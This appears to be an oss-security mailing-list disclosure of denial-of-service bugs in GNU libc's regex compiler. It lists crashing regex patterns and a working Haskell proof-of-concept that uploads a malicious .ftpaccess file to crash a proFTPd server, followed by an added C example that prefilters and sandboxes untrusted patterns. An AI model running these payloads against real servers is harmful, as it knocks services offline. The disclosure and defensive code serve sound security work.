Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
Date: Thu, 9 Feb 2017 14:24:58 -0300
From: Gustavo Grieco <gustavo.grieco@...il.com>
To: oss-security@...ts.openwall.com, Agustin Mista <mista.agustin@...il.com>
Subject: Multiple DoS parsing and executing extended regex expressions in GNU libc

Hello,

We found a few extended regex expressions in GNU libc that will crash or
abort the execution of regcomp or regexec. For instance:

\a?{1,32767}

will immediately exhaust the stack calling calc_eclosure_iter in the
compilation. A small variation of this regex is:

\a?{0,32767}

will consume a very large amount of memory: it seems to eat 16GB in less
than a minute. It is also possible to exhaust the stack memory trying to
parse:

(((((((( ... repeated 15000 times

This issue occurs because regcomp calls the parse_expression,
parse_branch and parse_reg_exp functions over and over again.
Finally, the following regex will trigger an abort or invalid free when
regexec is called:

/S^^|\0|()//S^^|\0|()//S^^|\1|()/

I don't think these issues can be used to execute arbitrary code, but it
seems quite easy to produce a DoS if a remote application is parsing
untrusted regex expressions.
In fact, we asked one of our students, Agustín Mista, to create a simple PoC
to show how to crash a proFTP server if you can write a .ftpaccess file.
You can find the script attached.

These issues were tested in GNU libc 2.19 (Ubuntu 14.04) and 2.24 (ArchLinux).

I think it should affect the last version of GNU libc as well. Can someone
confirm it?

I'm investigating how to submit these issues in the new CVE form...


Regards,
Gustavo.


#!/usr/bin/env stack 
-- stack runghc --resolver lts-7.0 --system-ghc --package ftphs
--
-- Multiple denial of service in regcomp
-- glibc <= 2.25
--
-- This PoC can disturb proFTPd when compiled without
-- pcre support. It requires a valid user with
-- upload permissions.
--
-- by A. Mista.
--
-- For testing purposes only. Do no harm.

import System.Environment
import System.IO
import Network.FTP.Client
import Control.Exception

handler :: SomeException -> IO ()
handler _ = putStrLn "[+] It's dead, Jim"

main = do
    args <- getArgs
    case args of
        [addr, user, pass] -> do 
            putStrLn "[+] Connecting to the ftp server and login"
            conn <- easyConnectFTP addr
            login conn user (Just pass) Nothing
            putStrLn "[+] Sending the mighty regex"
            putbinary conn ".ftpaccess" "HideFiles \"\\a?{1,32767}\"\n"
            putStrLn "[+] Triggering the server to parse .ftpaccess"
            catch (dir conn Nothing >> putStrLn "[-] Not affected") handler
        _ -> putStrLn "USAGE: ./PoC.hs [ADDRESS] [USER] [PASSWORD]"
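Added example, written for this page and not part of the original report or of A. Mista's PoC: a defensive way for a server that must compile patterns from untrusted input (the .ftpaccess case above) to survive the regcomp failure modes described. Two layers are combined: a cheap syntactic prefilter that rejects the reported shapes (a huge {m,n} bound or very deep group nesting) before regcomp sees them, and a fork-based sandbox that compiles the pattern in a child under an address-space cap, a stack cap and an alarm, so a stack exhaustion, a runaway allocation or an abort only kills the child. The thresholds (1024 for repetition bounds, 32 for nesting depth, 256 MB, 5 s) and the function names are illustrative assumptions, not glibc constants. The regexec abort from the last pattern in the report is a match-time problem; the same fork-and-limit pattern applies to regexec, but this block only checks compilation.

```c
/* Added example (not from the original post or A. Mista's PoC): two
 * defensive layers for an application that must compile regexes it does
 * not trust. Thresholds below are illustrative assumptions, not glibc
 * constants.
 *   Layer 1 (pattern_prefilter): reject patterns whose shape matches the
 *     reported cases before they reach regcomp: a repetition bound above
 *     max_repeat, or group nesting deeper than max_depth.
 *   Layer 2 (sandboxed_regcomp_check): compile in a forked child under an
 *     address-space cap, a stack cap and an alarm, so a crash, abort or
 *     runaway allocation inside regcomp only kills the child.
 */
#define _GNU_SOURCE
#include <ctype.h>
#include <regex.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

enum {
    PAT_OK = 0,
    PAT_TOO_DEEP,      /* more nested '(' than max_depth */
    PAT_BIG_REPEAT,    /* a {m,n} bound larger than max_repeat */
    PAT_INVALID,       /* regcomp rejected it cleanly (REG_E* error) */
    PAT_CRASHED,       /* child died by signal: SIGSEGV, SIGABRT, ... */
    PAT_TIMEOUT,       /* child ran past timeout_sec */
    PAT_INTERNAL       /* fork/waitpid failure */
};

/* Layer 1: one linear pass over the pattern. Deliberately conservative:
 * '(' and '{' inside bracket expressions are counted too, which can only
 * reject more patterns, never fewer. */
int pattern_prefilter(const char *pat, long max_repeat, int max_depth)
{
    int depth = 0;
    for (const char *p = pat; *p; p++) {
        if (*p == '\\') {              /* escaped char: skip it */
            if (!p[1]) break;
            p++;
        } else if (*p == '(') {
            if (++depth > max_depth) return PAT_TOO_DEEP;
        } else if (*p == ')') {
            if (depth > 0) depth--;
        } else if (*p == '{') {        /* {m}, {m,} or {m,n} */
            const char *q = p + 1;
            while (*q && *q != '}') {
                if (isdigit((unsigned char)*q)) {
                    char *end;
                    long v = strtol(q, &end, 10);
                    if (v > max_repeat) return PAT_BIG_REPEAT;
                    q = end;
                } else if (*q == ',') {
                    q++;
                } else {
                    break;             /* not an interval; literal brace */
                }
            }
        }
    }
    return PAT_OK;
}

/* Layer 2: compile in a child that cannot take the parent down with it. */
int sandboxed_regcomp_check(const char *pat, unsigned timeout_sec, rlim_t mem_bytes)
{
    pid_t pid = fork();
    if (pid < 0) return PAT_INTERNAL;
    if (pid == 0) {
        struct rlimit as = { mem_bytes, mem_bytes };
        struct rlimit st = { 1 << 20, 1 << 20 };
        setrlimit(RLIMIT_AS, &as);     /* runaway allocation -> REG_ESPACE or kill */
        setrlimit(RLIMIT_STACK, &st);  /* deep recursion -> SIGSEGV in the child */
        alarm(timeout_sec);            /* slow compilation -> SIGALRM */
        regex_t re;
        int rc = regcomp(&re, pat, REG_EXTENDED | REG_NOSUB);
        if (rc == 0) regfree(&re);
        _exit(rc == 0 ? 0 : 1);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return PAT_INTERNAL;
    if (WIFEXITED(status)) return WEXITSTATUS(status) == 0 ? PAT_OK : PAT_INVALID;
    if (WIFSIGNALED(status)) return WTERMSIG(status) == SIGALRM ? PAT_TIMEOUT : PAT_CRASHED;
    return PAT_INTERNAL;
}

/* Both layers, with the illustrative limits assumed for this example. */
int check_untrusted_pattern(const char *pat)
{
    int rc = pattern_prefilter(pat, 1024, 32);
    if (rc != PAT_OK) return rc;
    return sandboxed_regcomp_check(pat, 5, (rlim_t)256 << 20);
}

int main(void)
{
    static const char *const names[] = { "ok", "too deep", "big repeat",
        "invalid", "crashed", "timeout", "internal" };
    /* constructed inputs: a benign pattern plus the compile-time shapes from the report */
    const char *samples[] = { "^[a-z_][a-z0-9_]*$", "\\a?{1,32767}", "\\a?{0,32767}",
        "(((((((((((((((((((((((((((((((((((((((" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-45.45s -> %s\n", samples[i], names[check_untrusted_pattern(samples[i])]);
    return 0;
}
```

The prefilter is the cheap layer and should be tuned to what the application actually needs (a configuration file rarely needs a repetition bound above a few hundred); the fork layer is the one that turns a process-killing crash into an error return, and it costs a fork per pattern, so it belongs at configuration-load time rather than in a request path.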
